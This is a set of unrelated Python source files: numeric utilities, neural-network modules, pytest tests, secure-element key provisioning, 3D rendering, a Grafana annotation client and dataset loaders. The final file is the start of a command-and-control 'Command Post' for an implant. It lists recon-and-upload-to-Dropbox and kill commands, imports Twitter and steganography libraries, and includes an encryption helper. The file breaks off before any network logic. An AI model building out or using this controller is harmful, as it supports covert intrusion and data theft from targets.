print(NumUtil.base_num(4))
print(NumUtil.base_num(0.001))
print(NumUtil.base_num(0.018))
print(NumUtil.base_num(0.00100))
print(NumUtil.base_num(2120.00))
print(NumUtil.base_num(700))
# print(NumUtil.to_digit('-7,097,985.0원'))
# print(NumUtil.has_digit('-a22a'))
# print(type(NumUtil.auto_convert('20160101')))
# print(type(NumUtil.auto_convert('2016-01-01')))
# print(type(NumUtil.auto_convert('+1')))
# print(type(NumUtil.auto_convert('-1')))
# print(type(NumUtil.auto_convert('-1.1')))
# print(NumUtil.to_digit('0001020'))
# print(NumUtil.to_digit('0000000'))
# print(NumUtil.int2digit(8)
# print(NumUtil.int2digit(8, 2)
# print(NumUtil.int2digit(8, 16)
# print(NumUtil.comma_str(-100000)
# print(NumUtil.remove_comma('123,456,789'))
# print(NumUtil.remove_comma('브렉시트 충격서 벗어나는 코스피…나흘째 올라 1,970선 회복'))
# print(NumUtil.remove_comma('가,나,다 123,456,789.00'))
# print(NumUtil.remove_comma('23,456,789.00억원'))
# print(NumUtil.to_readable(0.001))
# print(NumUtil.to_readable(0.0001))
# print(NumUtil.to_readable(1000))
# print(NumUtil.to_readable(10000))
# print(NumUtil.to_readable('title'))
# print(NumUtil.comma_str(123456789012345.1234))
# print(NumUtil.comma_str(123456789012345.1234, 2))
# print(NumUtil.comma_str(123456789012345, 1))
# print(NumUtil.comma_str('123456789012345.1234'))
# print(NumUtil.comma_str('123456789012345.1234', 2))
# print(NumUtil.comma_str('123456789012345', 1))
pass
|
11556918
|
import torch
import torch.nn as nn
from torch.autograd import Variable
class DescriptionEncoder(nn.Module):
"""
This class is for the Description Encoder
which is a stacked LSTM. It can be used to
encode a given input, a description of an entity,
and outputs the embedding for that entity.
"""
def __init__(self, embed_size, hidden_size, seq_len, num_layers):
"""
Initialize the model
Arguments
---------
embed_size : Size of the pre-trained embeddings
hidden_size : Size of the hidden layers
seq_len : Length of input sequence
num_layers : Number of layers in the LSTM
"""
super(DescriptionEncoder, self).__init__()
self.embed_size = embed_size
self.hidden_size = hidden_size
self.seq_len = seq_len
self.num_layers = num_layers
self.inp = nn.Linear(embed_size, hidden_size)
self.lstm = nn.LSTM(hidden_size, hidden_size // 2, 1,
batch_first=True)
self.rnn = nn.RNN(hidden_size // 2, hidden_size,
num_layers, batch_first=True)
self.out = nn.Linear(hidden_size, embed_size)
def forward(self, inp_desc, hidden=None):
if hidden is None:
hidden = self.init_hidden()
inp_desc = self.inp(inp_desc)
output, hidden = self.rnn(self.lstm(inp_desc)[0])
output = self.out(output)
return output, hidden
def init_hidden(self):
return Variable(torch.zeros(self.num_layers,
self.seq_len,
self.hidden_size))
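# A minimal usage sketch (sizes are illustrative, not part of the original module):
if __name__ == '__main__':
    enc = DescriptionEncoder(embed_size=300, hidden_size=128, seq_len=20, num_layers=2)
    desc = torch.randn(4, 20, 300)  # (batch, seq_len, embed_size)
    out, hidden = enc(desc)
    print(out.shape)  # torch.Size([4, 20, 300]) -- back in embedding space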
|
11556932
|
import pytest
from pytest_cases import fixture
class TestMethod:
@pytest.fixture
def pytest_fxt(self):
return "Hello"
def test_with_pytest(self, pytest_fxt):
# succeeds
assert pytest_fxt == "Hello"
@fixture
def cases_fxt(self):
return "Hello"
def test_with_cases(self, cases_fxt):
# raises an error with regards to 'self'
assert cases_fxt == "Hello"
def test_synthesis(module_results_dct):
assert list(module_results_dct) == [
'test_with_pytest',
'test_with_cases'
]
|
11556965
|
import base64
import binascii
import os
import os.path
import cryptography
from cryptography import x509
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec, utils
from cryptoauthlib import *
from mchpcert_bckp_restore import isMCHP_cert, mchp_cert_bckp
from public_key_rotation_helper import *
from certs_handler import *
from trustplatform import *
# Setup cryptography
crypto_be = cryptography.hazmat.backends.default_backend()
tflexSlotType = {
0: "private", 1: "private", 2: "private", 3: "private",
4: "private", 5: "secret", 6: "secret", 7: "sboot_dig",
8: "reserved", 9: "secret", 10: "cert", 11: "cert",
12: "cert", 13: "public", 14: "public", 15: "public"
}
slotsize = {
0: 32, 1: 32, 2: 32, 3: 32,
4: 32, 5: 32, 6: 32, 7: 32,
8: 416, 9: 64, 10: 64, 11: 64,
12: 64, 13: 64, 14: 64, 15: 64
}
# General Cryptoauthlib Macros
LOCK_ZONE_CONFIG = 0x00
LOCK_ZONE_DATA = 0x01
LOCK_ZONE_NO_CRC = 0x80
LOCK_ZONE_CONFIG = 0x00
ATCA_ZONE_CONFIG = 0x00
ATCA_ZONE_DATA = 0x02
resource_dir = "../resources/"
def create_resources_for_c_examples():
application_bin = 'secureboot_test_app.bin'
application_h = 'secureboot_test_app.h'
app_signature_bin = 'secureboot_test_app_sign.bin'
app_signature_h = 'secureboot_test_app_sign.h'
with open(application_bin, 'rb') as f:
app_image = f.read()
with open(application_h, 'w') as f:
f.write('uint8_t secureboot_test_app[] = {\n')
f.write(str(common_helper.convert_to_hex_bytes(app_image)))
f.write('};')
BLOCKSIZE = 65536
# Hashing the Application binary file bin_file
chosen_hash = hashes.SHA256()
hasher = hashes.Hash(chosen_hash, crypto_be)
app_file = open(application_bin, "rb")
buf = app_file.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = app_file.read(BLOCKSIZE)
app_file.close()
digest = hasher.finalize()
key_file = 'slot_15_ecc_key_pair.pem'
with open(key_file, 'rb') as f:
# Loading the private key from key_file
private_key = serialization.load_pem_private_key(
data=f.read(),
            password=None,  # the key file is written with NoEncryption, so no password
backend=crypto_be)
# Signing the digest of the Application binary file bin_file
sign = private_key.sign(
digest,
ec.ECDSA(utils.Prehashed(chosen_hash))
)
# Extract actual Signature bytes
r_offset = (sign[3]-32)+4
sign_r = sign[r_offset:r_offset+32]
s_offset = (sign[r_offset+32+1]-32)+(r_offset+32+2)
sign_s = sign[s_offset:s_offset+32]
with open(app_signature_bin, 'wb') as f:
f.write(sign_r)
f.write(sign_s)
with open(app_signature_h, 'w') as f:
f.write('uint8_t secureboot_test_app_sign[] = {\n')
f.write(str(common_helper.convert_to_hex_bytes(sign_r) + common_helper.convert_to_hex_bytes(sign_s)))
f.write('};')
def create_resource_and_program(slot_number):
"""
Creates resource for a slot according to its type then programs it
"""
# Get slot type from dict
slot_type = tflexSlotType[slot_number]
# Get slot size from dict
slot_size = int(slotsize[slot_number])
# Configure and create data according to slot type
if (slot_type == "private"):
print("Slot", slot_number, "is a private key slot, no action required")
#print("Tflex devices ship with generated private keys in respective slots")
elif (slot_type == "secret") or (slot_type == "general"):
# Generate data
new_key_bytes = bytearray(slot_size)
new_key_bytes = os.urandom(slot_size)
# Generate the .pem file
if (slot_type == "secret"):
addstr = "_secret_key"
elif (slot_type == "general"):
addstr = "_general_data"
key_file_name = "slot_" + str(slot_number) + addstr + ".pem"
if (slot_number != 5):
assert atcab_write_bytes_zone(ATCA_ZONE_DATA, slot_number, 0, new_key_bytes, slot_size) == Status.ATCA_SUCCESS
elif (slot_number == 5):
with open("slot_6_secret_key.pem", 'rb') as f:
pem_bytes = f.read()
type_name, headers, io_key = pem.unarmor(pem_bytes)
#print(binascii.hexlify(io_key[17: len(io_key)]))
io_key = io_key[17: len(io_key)]
assert atcab_write_enc(slot_number, 0, new_key_bytes, io_key, 6) == Status.ATCA_SUCCESS
print('\nNOTE: While writing symmetric key into secure element it has to be encrypted with IO protection key. So here, Slot 6 (IO protection key) is written before slot 5 (Symmetric key) \n')
with open(key_file_name.replace('.pem', '.h'), 'w') as f:
f.write('uint8_t '+ 'slot_' + str(slot_number) + addstr + '[] = {\n')
key_for_c = common_helper.convert_to_hex_bytes(new_key_bytes)
f.write(str(key_for_c))
f.write('};')
f.close()
with open(key_file_name, 'w') as f:
f.write(common_helper.convert_symmetric_to_pem(new_key_bytes, slot_size))
f.close()
print("Slot", slot_number, "is a "+tflexSlotType[slot_number]+' key, created ' + key_file_name+' and programmed')
elif (slot_type == "reserved"):
print("Slot", slot_number, "is a general purpose slot of size 416 bytes, no action required")
elif (slot_type == "sboot_dig"):
print("Slot", slot_number, "is a secureboot digest slot, slot can only be written through secureboot command")
elif (slot_type == "cert"):
print("Slot", slot_number, "is a certificate slot, no action required now, will be updated as part of Generate Certificates")
elif (slot_type == "public"):
addstr = "_ecc_key_pair"
key_file_name = "slot_" + str(slot_number) + addstr + ".pem"
priv_key = ec.generate_private_key(ec.SECP256R1(), crypto_be)
# Save private key to file
with open(key_file_name, 'wb') as f:
pem_key = priv_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption())
f.write(pem_key)
f.close()
with open(key_file_name, 'rb') as f:
# Load the public key from key file
priv_key = serialization.load_pem_private_key(
data=f.read(),
                password=None,  # generated above with NoEncryption, so no password
backend=default_backend())
public_key = priv_key.public_key().public_numbers().encode_point()[1:]
if (slot_number == 14):
public_key_check_validate()
public_key_slot_data = bytearray(4) + public_key[0:32] + bytearray(4) + public_key[32:64]
#write secure boot public key to crypto device
assert atcab_write_bytes_zone(ATCA_ZONE_DATA, slot_number, 0, public_key_slot_data, 72) == Status.ATCA_SUCCESS
print("Slot", slot_number, "is a "+tflexSlotType[slot_number]+' key slot, created ' + key_file_name+' and programmed')
else:
raise ValueError("Undefined slot type")
return True
def mchp_cert():
"""
Function check the if device contains MCHP certificate or not.
If MCHP cert, it will validate the cert chain and print it.
If MCHP cert not found, then it will check backup cert in the filesystem and
it will provision into device
"""
mchp_cert_info = isMCHP_cert()
if mchp_cert_info['status'] == Status.ATCA_SUCCESS:
status = certs_handler.validate_and_print_certificate_chain(mchp_cert_info['root_cert'],
mchp_cert_info['signer_cert'], mchp_cert_info['device_cert'])
else:
status = mchp_cert_bckp(mchp_cert_info)
if status == Status.ATCA_SUCCESS:
return 'success'
else:
return 'danger'
def custom_cert(org_name):
"""
Function takes MCHP certificates backup if it found in device and
generate custom certificate and provision to device
"""
mchp_cert_info = isMCHP_cert()
if mchp_cert_info['status'] == Status.ATCA_SUCCESS:
status = mchp_cert_bckp(mchp_cert_info)
#org_name = "{:<24}".format(org_name[:24]).replace(" ", "_")
#print('Adjusted Orgname for size and spaces:' + org_name)
#assert len(org_name) < 25, "Org name can be maximum of 24 characters"
root_key_path = Path('root_key.key')
root_pub_key_path = Path('root_pub_key.pem')
root_cert_path = Path('root_crt.crt')
signer_id = 'FFFF'
signer_key_path = Path('signer_'+signer_id+'.key')
signer_cert_path = Path('signer_'+signer_id+'.crt')
device_cert_path = Path('device_template.crt')
certs_handler.set_root_user_data(org_name)
certs_handler.set_signer_user_data(org_name)
certs_handler.set_device_user_data(org_name)
certs_handler.create_trust_chain(root_key_path, root_cert_path, signer_id, signer_key_path, signer_cert_path, device_cert_path)
signer_cert_def, device_cert_def = certs_handler.generate_cert_def_files(root_cert_path, signer_id, signer_cert_path, device_cert_path)
with open(root_pub_key_path, 'w') as f:
f.write(common_helper.convert_ec_pub_to_pem(certs_handler.get_public_key(root_key_path)))
f.close()
print('Read device serial number...', end='')
serial_num = bytearray(9)
assert Status.ATCA_SUCCESS == atcab_read_serial_number(serial_num)
print('OK (SN: {})'.format(serial_num.hex().upper()))
print('Read device public key from slot {}...'.format(device_cert_def.private_key_slot), end='')
public_key = bytearray(64)
assert Status.ATCA_SUCCESS == atcab_get_pubkey(device_cert_def.private_key_slot, public_key)
print('OK (Public Key: {})'.format(public_key.hex().upper()))
print('Generating device certificate...'.format(device_cert_def.private_key_slot), end='')
device_cert_path = Path('device_{}.crt'.format(base64.b16encode(serial_num).decode('ascii')))
device_cert = certs_handler.build_device_cert(serial_num, public_key, signer_key_path, signer_cert_path, device_cert_path)
print('OK (saved to {})'.format(device_cert_path))
print('Saving signer certificate to device...', end='')
signer_cert_der = read_cert(signer_cert_path).public_bytes(encoding=Encoding.DER)
assert Status.ATCA_SUCCESS == atcacert_write_cert(signer_cert_def, signer_cert_der, len(signer_cert_der))
print('OK')
print('Saving device certificate to device...', end='')
device_cert_der = device_cert.public_bytes(encoding=Encoding.DER)
assert Status.ATCA_SUCCESS == atcacert_write_cert(device_cert_def, device_cert_der, len(device_cert_der))
print('OK')
for extension in device_cert.extensions:
if extension.oid._name != 'subjectKeyIdentifier':
continue # Not the extension we're looking for, skip
thing_name = binascii.b2a_hex(extension.value.digest).decode('ascii')
print('Thing ID {}'.format(thing_name))
kit_info = certs_handler.read_kit_info()
kit_info['thing_name'] = thing_name.lower()
certs_handler.save_kit_info(kit_info)
print('\n\r---------------------------------------------')
print('Custom certificate generation and provisioning - SUCCESS')
print('---------------------------------------------\n\r')
# validate and print the certificate chain
status = certs_handler.validate_and_print_certificate_chain(read_cert(root_cert_path),
read_cert(signer_cert_path), read_cert(device_cert_path))
if status == Status.ATCA_SUCCESS:
return 'success'
else:
return 'danger'
|
11556991
|
from distutils.core import setup, Extension
import platform
libname = 'ivhc'
if platform.system()=='Darwin':
libname = 'ivhc.mac'
module = Extension('ivhc',
sources = ['ivhcNoiseEst.cpp'],
include_dirs = [],
libraries = [libname],
library_dirs = ['/usr/local/lib', './'],
extra_compile_args=['-std=c++11'])
setup(name = 'ivhc',
version = '1.0',
description = 'ivhc for image noise estimation',
ext_modules = [module])
|
11556995
|
from functools import reduce
from Obj3D import Point3D, Sphere, Cone, calculateBound, calScaleRatio
import numpy as np
from numpy import linalg as LA
from scipy.spatial import distance_matrix
def getObjList(nodes, graph, node_idx=None):
if node_idx:
        # sphere index list (the node itself plus its neighbors)
sphere_idxs = [node_idx]+list(graph[node_idx])
sphere_list = [Sphere(Point3D(*nodes[x].pos), nodes[x].r) for x in sphere_idxs]
        # cone index-pair list (node paired with each neighbor)
cone_idx_pairs = [(node_idx, x) for x in graph[node_idx]]
cone_list = [Cone(Point3D(*nodes[p[0]].pos),nodes[p[0]].r,Point3D(*nodes[p[1]].pos),nodes[p[1]].r) for p in cone_idx_pairs]
    else:  # return all nodes
sphere_list=[]
cone_list=[]
for node_idx in nodes.keys():
            # add the sphere for the current node
sphere_list.append(Sphere(Point3D(*nodes[node_idx].pos), nodes[node_idx].r))
            # cone index-pair list (node_idx < x keeps each edge only once)
cone_idx_pairs = [(node_idx, x) for x in graph[node_idx] if node_idx<x]
cone_list_local = [Cone(Point3D(*nodes[p[0]].pos),nodes[p[0]].r,Point3D(*nodes[p[1]].pos),nodes[p[1]].r) \
for p in cone_idx_pairs]
cone_list.extend(cone_list_local)
return sphere_list, cone_list
def checkSphereV2(mark, sphere, img_shape):
bbox = list(sphere.calBBox()) # xmin,ymin,zmin,xmax,ymax,zmax
for i in range(3):
j = i+3
if (bbox[i]<0):
bbox[i] = 0
if (bbox[j]>img_shape[i]):
bbox[j] = img_shape[i]
(xmin,ymin,zmin,xmax,ymax,zmax) = tuple(bbox)
(x_idxs,y_idxs,z_idxs)=np.where(mark[xmin:xmax,ymin:ymax,zmin:zmax]==0)
# points=img_idxs[:3, xmin+x_idxs, ymin+y_idxs, zmin+z_idxs] # 3*M
# points=points.T # M*3
xs = np.asarray(xmin+x_idxs).reshape((len(x_idxs),1))
ys = np.asarray(ymin+y_idxs).reshape((len(y_idxs),1))
zs = np.asarray(zmin+z_idxs).reshape((len(z_idxs),1))
points=np.hstack((xs,ys,zs))
sphere_c_mat = np.array([sphere.center_point.toList()]) # 1*3
    # distances from all candidate points to the sphere center
dis_mat = distance_matrix(points,sphere_c_mat) # M*1
    # select points whose distance is within the radius
res_idxs = np.where(dis_mat<=sphere.radius)[0]
mark[xmin+x_idxs[res_idxs], ymin+y_idxs[res_idxs], zmin+z_idxs[res_idxs]] = 255
def checkConeV2(mark, cone, img_shape):
bbox = list(cone.calBBox()) # xmin,ymin,zmin,xmax,ymax,zmax
for i in range(3):
j = i+3
if (bbox[i]<0):
bbox[i] = 0
if (bbox[j]>img_shape[i]):
bbox[j] = img_shape[i]
(xmin,ymin,zmin,xmax,ymax,zmax) = tuple(bbox)
(x_idxs,y_idxs,z_idxs)=np.where(mark[xmin:xmax,ymin:ymax,zmin:zmax]==0)
# points=img_idxs[:, xmin+x_idxs, ymin+y_idxs, zmin+z_idxs] # 3*M
# points=points.T # M*3
xs = np.asarray(xmin+x_idxs).reshape((len(x_idxs),1))
ys = np.asarray(ymin+y_idxs).reshape((len(y_idxs),1))
zs = np.asarray(zmin+z_idxs).reshape((len(z_idxs),1))
ns = np.ones((len(z_idxs),1))
points=np.hstack((xs,ys,zs,ns))
    # revert (inverse) transform matrix for this cone
r_min=cone.up_radius
r_max=cone.bottom_radius
height=cone.height
cone_revert_mat = cone.revertMat().T # 4*4
    # point coordinates in the cone's canonical frame after reverting
revert_coor_mat = np.matmul(points, cone_revert_mat) # M*4
revert_radius_list = LA.norm(revert_coor_mat[:,:2], axis=1) # M
# Local Indexs
M = points.shape[0]
l_idx = np.arange(M) # M (1-dim)
l_mark = np.ones((M,), dtype=bool)
    # drop points whose height falls outside [0, height]
res_idxs = np.logical_or(revert_coor_mat[l_idx[l_mark],2]<0, revert_coor_mat[l_idx[l_mark],2]>height)
l_mark[l_idx[l_mark][res_idxs]]=False
    # drop points outside the bottom (outer) radius
res_idxs = revert_radius_list[l_idx[l_mark]]>r_max
l_mark[l_idx[l_mark][res_idxs]]=False
    # points within the top (inner) radius are definitely inside; mark them
res_idxs = revert_radius_list[l_idx[l_mark]]<=r_min
mark[xmin+x_idxs[l_idx[l_mark][res_idxs]], ymin+y_idxs[l_idx[l_mark][res_idxs]], zmin+z_idxs[l_idx[l_mark][res_idxs]]] = 255
l_mark[l_idx[l_mark][res_idxs]]=False
    # remaining points: test against the slanted surface, where the allowed
    # height at radius r is (r_max - r) * height / (r_max - r_min)
# import pdb
# pdb.set_trace();
if r_max>r_min:
res_idxs = ((r_max-revert_radius_list[l_idx[l_mark]])*height/(r_max-r_min)) >= revert_coor_mat[l_idx[l_mark],2]
mark[xmin+x_idxs[l_idx[l_mark][res_idxs]], ymin+y_idxs[l_idx[l_mark][res_idxs]], zmin+z_idxs[l_idx[l_mark][res_idxs]]] = 255
l_mark[l_idx[l_mark][res_idxs]]=False
#@profile
def draw3dStackSparseV2(sphere_list, cone_list, img_shape):
    '''draw3dStackSparseV2: Draw a 3D image stack from sparse geometry.
    Args:
        sphere_list: spheres to rasterize.
        cone_list: truncated cones to rasterize.
        img_shape: (x, y, z) shape of the output volume.
    Returns:
        numpy.ndarray: uint8 volume, 255 inside any object, with axes 0 and 2
        swapped relative to img_shape.
    '''
# print('img_shape', img_shape)
img_total_length = reduce(lambda x,y:x*y, img_shape)
    # allocate the output volume
mark = np.zeros(img_shape, dtype=np.uint8)
    # rasterize the spheres
for s in sphere_list:
checkSphereV2(mark, s, img_shape);
    # rasterize the truncated cones
for c in cone_list:
checkConeV2(mark, c, img_shape);
    ## render the binary volume
#mark=np.where(mark==1, 255, 0).astype(np.uint8)
mark=np.swapaxes(mark,0,2)
return mark
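# A minimal usage sketch (hypothetical geometry; assumes Obj3D's Point3D and
# Sphere constructors as used in getObjList above):
if __name__ == '__main__':
    demo_sphere = Sphere(Point3D(16, 16, 16), 5)
    stack = draw3dStackSparseV2([demo_sphere], [], (32, 32, 32))
    print(stack.shape, stack.max())  # expected: (32, 32, 32) 255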
|
11556999
|
import re
# from whoosh.fields import NGRAMWORDS, TEXT, Schema
# from whoosh.filedb.filestore import RamStorage
# from whoosh.qparser import OrGroup, QueryParser
# from whoosh.query import Every
class SimpleIndex():
'''
Right now we're just doing substring search because indexing
made startup too slow, but making sure it is done through
this interface makes it easier for us to plug in something better,
at some point.
'''
def __init__(self):
self._index = {}
def add_document(self, doc_id, document):
self._index[doc_id] = document
def search(self, substrings):
if substrings:
matches = []
            for substring in re.split(r'\s+', substrings.strip()):
matches.extend([
id for (id, document) in self._index.items()
if substring in document
])
return matches
else:
return self._index.copy()
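# A minimal usage sketch (hypothetical documents, not part of the original
# interface):
#
#     index = SimpleIndex()
#     index.add_document('gene-1', 'BRCA1 breast cancer gene')
#     index.search('BRCA')  # -> ['gene-1']
#     index.search('')      # -> a copy of the whole index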
# commented out in requirements.txt:
# class WhooshIndex():
# # Search might be fast, but indexing is too slow to be useful.
#
# def __init__(self):
# storage = RamStorage()
# schema = Schema(gene_id=TEXT(stored=True),
# gene_tokens=NGRAMWORDS(stored=False, minsize=1))
# self._index = storage.create_index(schema)
#
# def add(self, *gene_ids):
# writer = self._index.writer()
# for gene_id in gene_ids:
# writer.add_document(gene_id=gene_id,
# gene_tokens=gene_id)
# writer.commit()
#
# def search(self, substrings):
# with self._index.searcher() as searcher:
# parser = QueryParser('gene_tokens', self._index.schema,
# group=OrGroup)
# query = parser.parse(substrings) if substrings else Every()
# results = searcher.search(query)
# return [result['gene_id'] for result in results]
|
11557000
|
from IPython.terminal.interactiveshell import TerminalInteractiveShell
TerminalInteractiveShell.confirm_exit = False
c = get_config()
try:
import line_profiler
c.TerminalIPythonApp.extensions = [
'line_profiler',
]
except Exception:
pass
|
11557068
|
def get_base_model(app_label, model):
from django.contrib.contenttypes.models import ContentType
return ContentType.objects.get(app_label=app_label.lower(), model=model.lower()).model_class()
def normalise_field(text):
return text.strip().replace('(', '::').replace(')', '').replace(".", "__")
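# For example, normalise_field("author(name).first") -> "author::name__first".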
|
11557076
|
import requests
import time
from influxdb import InfluxDBClient
from urllib.parse import urlparse
CURRENT_TIMESTAMP = int(time.time())
class Annotation:
"""
An annotation that we want to create
"""
def __init__(self, title, tags, description='', start=CURRENT_TIMESTAMP, end=CURRENT_TIMESTAMP):
if len(tags) == 0:
raise ValueError('Annotations must have at least one tag.')
if end < start:
raise ValueError('Annotation end time cannot be before start time.')
self.title = title
self.tags = tags
self.description = description
self.start = start
self.end = end
def web(self):
"""
Returns an annotation object formatted for grafana API
"""
annotation_event = {}
annotation_event['text'] = '<b>%s</b>\n\n%s' % (self.title, self.description)
annotation_event['tags'] = self.tags
annotation_event['time'] = int(round(self.start * 1000))
if self.start < self.end:
annotation_event['isRegion'] = True
annotation_event['timeEnd'] = int(round(self.end * 1000))
return annotation_event
def influxdb(self):
"""
Returns an annotation object formatted for InfluxDB
"""
tags_field = ';'.join(self.tags)
annotation_event = {}
annotation_event['measurement'] = 'events'
annotation_event['fields'] = {
'title': self.title,
'text': self.description,
'tags': tags_field
}
return [annotation_event]
def send(self, url, api_key):
"""
Send the annotation to a destination based on url
"""
url_parts = urlparse(url)
if 'http' in url_parts.scheme:
return self.send_to_web(url_parts, api_key)
elif 'influx' in url_parts.scheme:
return self.send_to_influxdb(url_parts)
else:
raise NotImplementedError('Scheme %s not recognised in uri %s' %
(url_parts.scheme, url))
def send_to_web(self, url_parts, api_key):
"""
POST event to an endpoint in Grafana Annotations API format
"""
event_data = self.web()
result_data = {'event_data': event_data}
url = url_parts.geturl()
auth_tuple = None
req_headers = {}
if api_key is not None:
req_headers['Authorization'] = "Bearer %s" % api_key
if url_parts.username and url_parts.password:
auth_tuple = (url_parts.username, url_parts.password)
url_host_port = url_parts.netloc.split('@')[1]
url = '%s://%s%s' % (url_parts.scheme, url_host_port, url_parts.path)
post_result = requests.post(url, json=event_data, auth=auth_tuple, headers=req_headers, timeout=5)
if post_result.status_code > 299:
raise Exception('Received %s response, sending event failed' % post_result.status_code)
if 'id' in post_result.json():
result_data['id'] = post_result.json()['id']
if 'message' in post_result.json():
result_data['message'] = post_result.json()['message']
return result_data
def send_to_influxdb(self, url_parts):
event_data = self.influxdb()
result_data = {'event_data': event_data}
client = InfluxDBClient(url_parts.hostname,
url_parts.port or 8086,
url_parts.username or '',
url_parts.password or '',
url_parts.path.replace('/', '', 1) or 'events')
if client.write_points(event_data):
result_data['message'] = 'Annotation added'
else:
result_data['message'] = 'Annotation failed'
return result_data
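# A minimal usage sketch (hypothetical values; the URL and API key are
# placeholders, not part of the original module):
#
#     event = Annotation('Deploy', ['deploy', 'prod'], description='v1.2.3')
#     payload = event.web()  # Grafana-formatted dict with text/tags/time
#     # event.send('http://grafana.example/api/annotations', api_key='...')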
|
11557081
|
import tensorflow as tf
def independent_outputs(featuremap, output_names, num_channels, filter_width, padding, activation):
outputs = dict()
for name in output_names:
outputs[name] = tf.layers.conv1d(featuremap, num_channels, filter_width, activation=activation, padding=padding)
return outputs
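# Example (TF1-style; names and shapes are illustrative): one conv1d head per
# named output over a [batch, time, channels] feature map:
#
#     fm = tf.placeholder(tf.float32, [None, 100, 64])
#     heads = independent_outputs(fm, ['vocals', 'drums'], num_channels=2,
#                                 filter_width=3, padding='same',
#                                 activation=tf.nn.relu)
#     # heads['vocals'] and heads['drums'] each have shape [None, 100, 2]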
|
11557134
|
import numpy as np
import pytest
import xarray as xr
import py3dep
from py3dep import MissingAttribute, MissingColumns, MissingCRS, MissingDependency
def test_missing_nodata():
with pytest.raises(MissingAttribute) as ex:
dem = xr.DataArray(np.random.randn(2, 3), dims=("x", "y"), coords={"x": [10, 20]})
_ = py3dep.fill_depressions(dem)
assert "nodatavals" in str(ex.value)
|
11557156
|
import os
import dgl
import torch
import pickle
import pysmiles
from data_processing import networkx_to_dgl
class PropertyPredDataset(dgl.data.DGLDataset):
def __init__(self, args):
self.args = args
self.path = '../data/' + args.dataset + '/' + args.dataset
self.graphs = []
self.labels = []
super().__init__(name='property_pred_' + args.dataset)
def to_gpu(self):
if torch.cuda.is_available():
print('moving ' + self.args.dataset + ' dataset to GPU')
self.graphs = [graph.to('cuda:' + str(self.args.gpu)) for graph in self.graphs]
def save(self):
print('saving ' + self.args.dataset + ' dataset to ' + self.path + '.bin')
dgl.save_graphs(self.path + '.bin', self.graphs, {'label': self.labels})
def load(self):
print('loading ' + self.args.dataset + ' dataset from ' + self.path + '.bin')
self.graphs, self.labels = dgl.load_graphs(self.path + '.bin')
self.labels = self.labels['label']
self.to_gpu()
def process(self):
print('loading feature encoder from ../saved/' + self.args.pretrained_model + '/feature_enc.pkl')
with open('../saved/' + self.args.pretrained_model + '/feature_enc.pkl', 'rb') as f:
feature_encoder = pickle.load(f)
print('processing ' + self.args.dataset + ' dataset')
with open(self.path + '.csv') as f:
for idx, line in enumerate(f.readlines()):
if idx == 0 or line == '\n':
continue
items = line.strip().split(',')
if self.args.dataset == 'BBBP':
smiles, label = items[-1], items[-2]
# the next line is to remove unnecessary hydrogen atoms that will cause discontinuous node labels
smiles = smiles.replace('([H])', '').replace('[H]', '')
elif self.args.dataset == 'HIV':
smiles, label = items[0], items[-1]
smiles = smiles.replace('se', 'Se').replace('te', 'Te')
elif self.args.dataset == 'BACE':
smiles, label = items[0], items[2]
elif self.args.dataset == 'Tox21':
smiles, label = items[-1], items[11]
smiles = smiles.replace('se', 'Se')
if label == '':
continue
elif self.args.dataset == 'ClinTox':
smiles, label = items[0], items[2]
smiles = smiles.replace('[H]', '')
else:
raise ValueError('unknown dataset')
raw_graph = pysmiles.read_smiles(smiles, zero_order_bonds=False)
dgl_graph = networkx_to_dgl(raw_graph, feature_encoder)
self.graphs.append(dgl_graph)
self.labels.append(float(label))
self.labels = torch.Tensor(self.labels)
self.to_gpu()
def has_cache(self):
if os.path.exists(self.path + '.bin'):
print('cache found')
return True
else:
print('cache not found')
return False
def __getitem__(self, i):
return self.graphs[i], self.labels[i]
def __len__(self):
return len(self.graphs)
def load_data(args):
data = PropertyPredDataset(args)
return data
|
11557157
|
import viewflow
from unittest.mock import patch, ANY, call
@patch("viewflow.parsers.dependencies_r_patterns.custom_get_dependencies")
@patch("viewflow.parsers.dependencies_r_patterns.get_dependencies_default")
def test_default(get_default_mock, get_custom_mock):
viewflow.create_dag("./tests/projects/rmd/default_config")
# calling 'create_dag' does not resolve dependencies by default
get_default_mock.assert_not_called()
get_custom_mock.assert_not_called()
@patch("viewflow.parsers.dependencies_r_patterns.custom_get_dependencies")
@patch("viewflow.parsers.dependencies_r_patterns.get_dependencies_default")
def test_default_pattern(get_default_mock, get_custom_mock):
viewflow.create_dag("./tests/projects/rmd/pattern_default")
    # Dependencies must have been retrieved for all possible schemas
calls = [call(ANY, "viewflow"), call(ANY, "public")]
get_default_mock.assert_has_calls(calls, any_order=True)
get_custom_mock.assert_not_called()
@patch("viewflow.parsers.dependencies_r_patterns.custom_get_dependencies")
@patch("viewflow.parsers.dependencies_r_patterns.get_dependencies_default")
def test_custom_pattern(get_default_mock, get_custom_mock):
viewflow.create_dag("./tests/projects/rmd/pattern_custom")
    # Dependencies must have been retrieved for all possible schemas
get_default_mock.assert_not_called()
calls = [call(ANY, "viewflow"), call(ANY, "public")]
get_custom_mock.assert_has_calls(calls, any_order=True)
|
11557164
|
from cryptography.fernet import Fernet
import stepic
import tweepy
from PIL import Image
from termcolor import colored
import pyfiglet
import sys
import os
COMMANDS = {'help':['Shows this help'],
            'recon':['Recon module. Perform reconnaissance on the target system and upload Intel to Dropbox'],
'kill':['Kills the Implant on target machine'],
'shutdown':['Shuts down Command Post'],
}
# Twitter Dev Account API Keys
CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_TOKEN = ''
ACCESS_TOKEN_SECRET = ''
# Encryption/Decryption Symmetric Key (Hardcoded) - PLEASE CHANGE IT!
key = b'<KEY>'
def encrypt(plaintext, key):
# Takes the plain text as string and key and encrypts and returns the encrypted text
plaintext = plaintext.encode()
f = Fernet(key)
enctext = f.encrypt(plaintext)
enctext = enctext.decode()
return enctext
def main():
global CONSUMER_KEY
global CONSUMER_SECRET
global ACCESS_TOKEN
global ACCESS_TOKEN_SECRET
print_banner()
print("\n")
CONSUMER_KEY = input(colored("Enter the Consumer Key: ", 'blue'))
CONSUMER_SECRET = input(colored("Enter the Consumer Secret: ", 'blue'))
ACCESS_TOKEN = input(colored("Enter the Access Token: ", 'blue'))
ACCESS_TOKEN_SECRET = input(colored("Enter the Access Token Secret: ", 'blue'))
print("\n")
while True:
